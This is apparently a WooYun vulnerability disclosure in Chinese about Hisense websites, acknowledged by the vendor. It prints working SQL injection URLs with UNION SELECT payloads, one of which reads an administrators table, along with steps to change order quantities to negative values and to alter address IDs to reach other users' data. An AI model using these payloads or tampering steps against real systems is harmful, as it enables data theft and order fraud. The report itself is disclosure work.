漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-085287
漏洞标题:海信集团网站漏洞礼包(注入+越权地址查看+订单金额修改)
相关厂商:hisense.com
漏洞作者: JJ Fly
提交时间:2014-12-01 10:26
修复时间:2015-01-15 10:28
公开时间:2015-01-15 10:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经确认,细节仅向厂商公开
2014-12-11: 细节向核心白帽子及相关领域专家公开
2014-12-21: 细节向普通白帽子公开
2014-12-31: 细节向实习白帽子公开
2015-01-15: 细节向公众公开
简要描述:
海信集团网站漏洞礼包(注入+越权地址查看+订单金额修改)
详细说明:
1.
注入
http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Length=1.4km
Length=1.4km 存在sql注入漏洞
好多数据库
爆下数据
http://hbmt.hisense.com:80/cn/product.aspx?ClassID=z8UwZwanMEg=&Length=1.4km%' UNION ALL SELECT 1,2,char(101),char(102),char(103),char(104),char(105),char(106),char(107),char(108),char(109),char(110),3,char(112),char(113),char(114),4--
http://hbmt.hisense.com:80/cn/product.aspx?ClassID=z8UwZwanMEg=&Length=1.4km%' UNION ALL SELECT 1,2,char(101),(select top 1 LogId from E_Administrators ),char(103),char(104),char(105),char(106),char(107),char(108),char(109),char(110),3,char(112),char(113),char(114),4--
2.
http://www.hisensephone.com/
越权
可以越权查看他人 身份信息
删除的地方 可以越权 删除他人的地址
还有一处越权 ,可以在 下订单的时候 添加到他人的订单id
下面会说。
3.
http://www.hisensephone.com/
订单金额修改
下订单的时候
抓包
hdCount=62%241%249%24%E7%A7%BB%E5%8A%A83G%2F%E6%B8%A9%E8%8E%8E%E7%99%BD%24%24
解密下
hdCount=62$1$9$移动3G/温莎白$$
然后我们把 1 修改为-1 进行提交。
到时候就成负数了
设置地址的时候会发送一个
把地址的id进行修改就行了
漏洞证明:
同上
修复方案:
版权声明:转载请注明来源 JJ Fly@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-12-01 13:13
厂商回复:
感谢提报的安全报告,我们将尽快修复。
最新状态:
暂无